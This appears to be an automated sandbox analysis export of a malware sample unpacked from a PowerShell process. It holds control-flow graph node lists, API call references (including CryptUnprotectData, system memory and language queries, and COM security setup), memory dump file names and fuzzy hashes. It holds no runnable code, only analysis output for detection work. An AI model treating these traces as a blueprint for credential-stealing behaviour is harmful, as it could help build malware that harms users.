                                                                                                control_flow_graph 871 38a5c1 872 38a5c1-38a5c6 call 378020 871->872 874 38a5c9-38a5e9 call 3b0fd0 872->874 877 38a658-38a66f 874->877 878 38a5f0-38a618 call 378010 874->878 879 38a670-38a6b9 877->879 885 38a61f call 3b10a0 878->885 879->879 881 38a6bb-38a6c3 879->881 883 38a70a-38a76a call 371a90 881->883 884 38a6c5-38a6d4 881->884 897 38a770-38a7bb 883->897 886 38a6e0-38a6e7 884->886 887 38a624-38a62c 885->887 889 38a6e9-38a6ec 886->889 890 38a6f0-38a6f6 886->890 887->874 887->877 887->878 891 38a5c0 887->891 892 38a633-38a647 call 371000 887->892 889->886 894 38a6ee 889->894 890->883 895 38a6f8-38a707 call 3adcd0 890->895 891->871 904 38a64f-38a655 call 378020 892->904 894->883 895->883 897->897 898 38a7bd-38a7e1 call 371dd0 897->898 905 38a7e8 898->905 906 38a7f2-38a7f4 898->906 904->877 905->906 909 38a800-38a806 906->909 909->909 910 38a808-38a819 909->910 911 38a81b-38a81e 910->911 912 38a820-38a824 910->912 911->912 913 38a827-38a833 911->913 912->913 914 38a83a 913->914 915 38a835-38a838 913->915 916 38a83b-38a855 call 378010 914->916 915->914 915->916 919 38a85b-38a862 916->919 920 38a954-38a98d call 3af550 916->920 922 38a884-38a8cd call 38f530 * 2 919->922 923 38a992-38a9b9 CryptUnprotectData 920->923 928 38a8cf-38a8e6 call 38f530 922->928 929 38a870-38a87e 922->929 923->877 923->892 923->904 923->905 923->906 928->929 932 38a8e8-38a910 928->932 929->920 929->922 932->929 933 38a916-38a930 call 38f530 932->933 933->929 936 38a936-38a94f 933->936 936->929
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DGF9$UIQR$Xov$]AYZ
                                                                                                • API String ID: 0-1615133906
                                                                                                • Opcode ID: d428bc7118920516e93f5d05d47bd37cbe4012d33dae76146b275f799bb20d07
                                                                                                • Instruction ID: 172cd9fa2465e1a035473243ffbfbd30dfc402a6ae398f0c24e2ec59feb83bb9
                                                                                                • Opcode Fuzzy Hash: d428bc7118920516e93f5d05d47bd37cbe4012d33dae76146b275f799bb20d07
                                                                                                • Instruction Fuzzy Hash: 8AA127B29087418FE726DF28D84176FB7E2ABD4304F19866DE5C987241EB34DC06CB92

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 937 378710-378721 call 3ad380 940 378727-37872e call 3a5f90 937->940 941 378986-378988 ExitProcess 937->941 944 378734-378757 GetCurrentProcessId GetCurrentThreadId 940->944 945 378981 call 3adc20 940->945 947 37875b-37882f SHGetSpecialFolderPathW 944->947 948 378759 944->948 945->941 949 378830-378842 947->949 948->947 949->949 950 378844-37886b call 3abdb0 949->950 953 378870-37888c 950->953 954 3788a6-3788b9 GetForegroundWindow 953->954 955 37888e-3788a4 953->955 956 378930-378963 call 379be0 954->956 957 3788bb-37892e 954->957 955->953 960 378965 call 37c9f0 956->960 961 37896f-378976 956->961 957->956 965 37896a call 37b660 960->965 961->945 962 378978-37897e call 378020 961->962 962->945 965->961
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00378734
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0037873E
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00378810
                                                                                                • GetForegroundWindow.USER32 ref: 003788B1
                                                                                                • ExitProcess.KERNEL32 ref: 00378988
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4063528623-0
                                                                                                • Opcode ID: 4365e8bac38217e021e7da0fc6b9cb34b7306fcf5cce00b28cca6c8aa1de7828
                                                                                                • Instruction ID: ea10defdc49b161b4336bccc9acdabd2b8d7300ecb4ca4d94ac5afc2994cfdbd
                                                                                                • Opcode Fuzzy Hash: 4365e8bac38217e021e7da0fc6b9cb34b7306fcf5cce00b28cca6c8aa1de7828
                                                                                                • Instruction Fuzzy Hash: 41517E73B043154BD3186FB88C46355B6DA9BD9310F1EC63DA598DB391EA78CC028381

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1123 39dbba-39dbdb 1124 39dbe0-39dbfb 1123->1124 1124->1124 1125 39dbfd-39dc04 1124->1125 1126 39dc1b-39df47 1125->1126 1127 39dc06-39dc0a 1125->1127 1130 39df50-39df77 1126->1130 1128 39dc10-39dc19 1127->1128 1128->1126 1128->1128 1130->1130 1131 39df79-39df80 1130->1131 1132 39df9b-39dfa7 1131->1132 1133 39df82-39df86 1131->1133 1135 39dfa9-39dfab 1132->1135 1136 39dfc1-39dfe1 call 3af550 1132->1136 1134 39df90-39df99 1133->1134 1134->1132 1134->1134 1137 39dfb0-39dfbd 1135->1137 1140 39dfe6-39e00a GetPhysicallyInstalledSystemMemory 1136->1140 1137->1137 1139 39dfbf 1137->1139 1139->1136 1141 39e010-39e027 1140->1141 1141->1141 1142 39e029-39e062 call 3900d0 1141->1142 1145 39e070-39e0a4 1142->1145 1145->1145 1146 39e0a6-39e0ad 1145->1146 1147 39e0cd 1146->1147 1148 39e0af-39e0b5 1146->1148 1150 39e0cf-39e0d7 1147->1150 1149 39e0c0-39e0c9 1148->1149 1149->1149 1151 39e0cb 1149->1151 1152 39e0d9-39e0da 1150->1152 1153 39e0eb-39e0f5 1150->1153 1151->1150 1154 39e0e0-39e0e9 1152->1154 1155 39e10b-39e15f 1153->1155 1156 39e0f7-39e0fb 1153->1156 1154->1153 1154->1154 1158 39e160-39e174 1155->1158 1157 39e100-39e109 1156->1157 1157->1155 1157->1157 1158->1158 1159 39e176-39e17d 1158->1159 1160 39e19b-39e1a8 1159->1160 1161 39e17f-39e183 1159->1161 1162 39e1cb-39e245 1160->1162 1163 39e1aa-39e1b1 1160->1163 1164 39e190-39e199 1161->1164 1165 39e1c0-39e1c9 1163->1165 1164->1160 1164->1164 1165->1162 1165->1165
                                                                                                APIs
                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0039DFEE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                • String ID: J>I1
                                                                                                • API String ID: 3960555810-2340248489
                                                                                                • Opcode ID: 35cfa91f0d71e880d006a91732884de8c0e832e70474c0a1a752b7a8f9fa1b38
                                                                                                • Instruction ID: 3f6324394f9a81e13554d5f0b612095c49e00c040f9127ee8459c7f8c27390af
                                                                                                • Opcode Fuzzy Hash: 35cfa91f0d71e880d006a91732884de8c0e832e70474c0a1a752b7a8f9fa1b38
                                                                                                • Instruction Fuzzy Hash: D291E47050C7D18BDB2ACF3A845076BBFE1AF97304F284A5DE1E68B292D7758805CB52

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1175 39df11-39df47 call 3a3690 call 378020 1181 39df50-39df77 1175->1181 1181->1181 1182 39df79-39df80 1181->1182 1183 39df9b-39dfa7 1182->1183 1184 39df82-39df86 1182->1184 1186 39dfa9-39dfab 1183->1186 1187 39dfc1-39e00a call 3af550 GetPhysicallyInstalledSystemMemory 1183->1187 1185 39df90-39df99 1184->1185 1185->1183 1185->1185 1188 39dfb0-39dfbd 1186->1188 1192 39e010-39e027 1187->1192 1188->1188 1190 39dfbf 1188->1190 1190->1187 1192->1192 1193 39e029-39e062 call 3900d0 1192->1193 1196 39e070-39e0a4 1193->1196 1196->1196 1197 39e0a6-39e0ad 1196->1197 1198 39e0cd 1197->1198 1199 39e0af-39e0b5 1197->1199 1201 39e0cf-39e0d7 1198->1201 1200 39e0c0-39e0c9 1199->1200 1200->1200 1202 39e0cb 1200->1202 1203 39e0d9-39e0da 1201->1203 1204 39e0eb-39e0f5 1201->1204 1202->1201 1205 39e0e0-39e0e9 1203->1205 1206 39e10b-39e15f 1204->1206 1207 39e0f7-39e0fb 1204->1207 1205->1204 1205->1205 1209 39e160-39e174 1206->1209 1208 39e100-39e109 1207->1208 1208->1206 1208->1208 1209->1209 1210 39e176-39e17d 1209->1210 1211 39e19b-39e1a8 1210->1211 1212 39e17f-39e183 1210->1212 1213 39e1cb-39e245 1211->1213 1214 39e1aa-39e1b1 1211->1214 1215 39e190-39e199 1212->1215 1216 39e1c0-39e1c9 1214->1216 1215->1211 1215->1215 1216->1213 1216->1216
                                                                                                APIs
                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0039DFEE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                • String ID: J>I1
                                                                                                • API String ID: 3960555810-2340248489
                                                                                                • Opcode ID: 1595810cf311e1c2f60e69106f361b857f2c043d81cc97362378746e490bf9bc
                                                                                                • Instruction ID: 652afd8ab8bc47bc2ea1462ee2aff11bb42b2a3c0372e7c099804d1cea6cafc9
                                                                                                • Opcode Fuzzy Hash: 1595810cf311e1c2f60e69106f361b857f2c043d81cc97362378746e490bf9bc
                                                                                                • Instruction Fuzzy Hash: 3A81D17050C7908BDB2ACF39846176BBFE1AF97304F184A6DE1D68B292D7768805CB52
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString
                                                                                                • String ID: 0
                                                                                                • API String ID: 2525500382-4108050209
                                                                                                • Opcode ID: 273352fd448c53d3fa49b4eb3ee75393f0bf68a7ae3a2b775f1377bbbbf8a546
                                                                                                • Instruction ID: 45d0456f4cc406bbc8ff6e3bc82e07fbc08c440a61f34fb92f99e06d8bdb361c
                                                                                                • Opcode Fuzzy Hash: 273352fd448c53d3fa49b4eb3ee75393f0bf68a7ae3a2b775f1377bbbbf8a546
                                                                                                • Instruction Fuzzy Hash: 6FA12961108BC1CED316CB3D8888B527ED15B66328F0E82DDD1A98F7E3D6B9D505C726
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(003B0DFD,00000002,00000018,?,?,00000018,?,?,?), ref: 003ADCFE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString
                                                                                                • String ID: 0
                                                                                                • API String ID: 2525500382-4108050209
                                                                                                • Opcode ID: 24c8bd34cd28330f9f86f30b5a3344b8b9d050627f470fb8acc4c91e5386a0b7
                                                                                                • Instruction ID: d26c5b25d3771b43730e5c3d5e67e094eafe2f60be027bbdfbd305e3492e0a58
                                                                                                • Opcode Fuzzy Hash: 24c8bd34cd28330f9f86f30b5a3344b8b9d050627f470fb8acc4c91e5386a0b7
                                                                                                • Instruction Fuzzy Hash: 84811720108BC28ED326CB3D8998A057F916B6B224F0A87DCD0EA4F7F7D365D506C766
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeString
                                                                                                • String ID: 0
                                                                                                • API String ID: 3341692771-4108050209
                                                                                                • Opcode ID: 76923ed156b92b6e4a7c09ab8fc95f8aee5a05e3d74795f431cf0e87a2c5c976
                                                                                                • Instruction ID: df8aed883f697bb7e7ae4bb000b8e5731f716ef789d6fbfe8fb3f885bdf10fa0
                                                                                                • Opcode Fuzzy Hash: 76923ed156b92b6e4a7c09ab8fc95f8aee5a05e3d74795f431cf0e87a2c5c976
                                                                                                • Instruction Fuzzy Hash: 4981D4601087C0CEE356CB29C488B527FD16B66308F4A85DDC1994F7A3D7BADA09C766
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0037CA57
                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0037CA72
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0
                                                                                                • Opcode ID: d126f946fb3f589778cf566338517c3cb5e57ef7c2ac54ea5edd77eadd46dbfd
                                                                                                • Instruction ID: fa536fd18897150435a563c10c40ff0796ca0c44c1768c4c61f75a9dae3a5d8f
                                                                                                • Opcode Fuzzy Hash: d126f946fb3f589778cf566338517c3cb5e57ef7c2ac54ea5edd77eadd46dbfd
                                                                                                • Instruction Fuzzy Hash: 34F0F8367C87207AFA7E9A249D27F257225AB05F29F364308BB123E6D986D03601858C
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 003ADEE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: 482a0afa2992911e2bd3069a3f033cb39ba982d48d3028848ff93f2c3f0e7942
                                                                                                • Instruction ID: 8d7836d9cdd4825c91aa346bec339f70563d49333857e74300e0271ff2d622eb
                                                                                                • Opcode Fuzzy Hash: 482a0afa2992911e2bd3069a3f033cb39ba982d48d3028848ff93f2c3f0e7942
                                                                                                • Instruction Fuzzy Hash: 2F01F5B7F115500BDB069B399C466AA37D7D7C2729B1E8A39D646CBB05E979C80383C0
                                                                                                APIs
                                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 003A6F45
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DefaultLanguageUser
                                                                                                • String ID:
                                                                                                • API String ID: 95929093-0
                                                                                                • Opcode ID: cb5b11f17ba36fbf85b9b16edeccae2eba9324013c5edbbe4bb6c0c981b87fb4
                                                                                                • Instruction ID: 03ff75c504142e5f1a64c0b5ae268386fd92bc84d7359e9eb6b6acc593325093
                                                                                                • Opcode Fuzzy Hash: cb5b11f17ba36fbf85b9b16edeccae2eba9324013c5edbbe4bb6c0c981b87fb4
                                                                                                • Instruction Fuzzy Hash: CC113A76D042B68FCF128F7C8C013AE7FA15B5B320F1D86A8C9D567389D63499418791
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlanketProxy
                                                                                                • String ID:
                                                                                                • API String ID: 3890896728-0
                                                                                                • Opcode ID: 66090a4f5cff68bda153f18809656d4b32858f9ef34989bc2684a829bc59d8d1
                                                                                                • Instruction ID: f4873620f597f2dfe959b22eb03771dff0dea93bfd956b8f399e64ad8300b484
                                                                                                • Opcode Fuzzy Hash: 66090a4f5cff68bda153f18809656d4b32858f9ef34989bc2684a829bc59d8d1
                                                                                                • Instruction Fuzzy Hash: 37F067B45097418FD315DF28D5A8757BBF4FB88308F008A0DE5958B290CBB5A648CF82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlanketProxy
                                                                                                • String ID:
                                                                                                • API String ID: 3890896728-0
                                                                                                • Opcode ID: c9faafcbc27ac5672fc5186e1d7bcafca9cd3c8d4418abec3a583b78004115e1
                                                                                                • Instruction ID: f2640fe03d766c0b64b8522addde95c736e43d156d55d326378459d2f7432f29
                                                                                                • Opcode Fuzzy Hash: c9faafcbc27ac5672fc5186e1d7bcafca9cd3c8d4418abec3a583b78004115e1
                                                                                                • Instruction Fuzzy Hash: 38F067B45187018FD315DF69D5A471ABBF8EB84304F00991DE595CB390C775A649CF82
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 003ADEE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: 42e250ec0e44a4668561dc083e6650d1a17bbabf3bbae363ee7f77cf5b860cc7
                                                                                                • Instruction ID: 966d1e4078ed137a18ab4385f11ab7a767945ae8af2cd3ff17d1181515d9f815
                                                                                                • Opcode Fuzzy Hash: 42e250ec0e44a4668561dc083e6650d1a17bbabf3bbae363ee7f77cf5b860cc7
                                                                                                • Instruction Fuzzy Hash: 4EE0D1F69406404FCB16DF24ECC5A643355F7C5319709876ED501C7719E675E51BCB40
                                                                                                APIs
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0037CA03
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 03beb493489d6c6ac604b8745d8e7ae8d019e3edf77c913ff50340181923d51a
                                                                                                • Instruction ID: adebef2f04c846c24287176cb65a0ce58cacf6fd17ba048a3f7589db92b0d6db
                                                                                                • Opcode Fuzzy Hash: 03beb493489d6c6ac604b8745d8e7ae8d019e3edf77c913ff50340181923d51a
                                                                                                • Instruction Fuzzy Hash: 0BE0C2326941042BD349EA3DEC1BF12361F9381729F54832AB253C22D5D92499018264
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000,003B02C8,?,?,00000000,00000000,?,?), ref: 003ABDEE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 06454546e9441a90ec33baef8e2b1f3e70f1d6b0dabd023381cf99213dc2168d
                                                                                                • Instruction ID: f75ba90788e21be4b7956073c469a0042ddd2b04e7e3cb556ecc30d9bddda4ce
                                                                                                • Opcode Fuzzy Hash: 06454546e9441a90ec33baef8e2b1f3e70f1d6b0dabd023381cf99213dc2168d
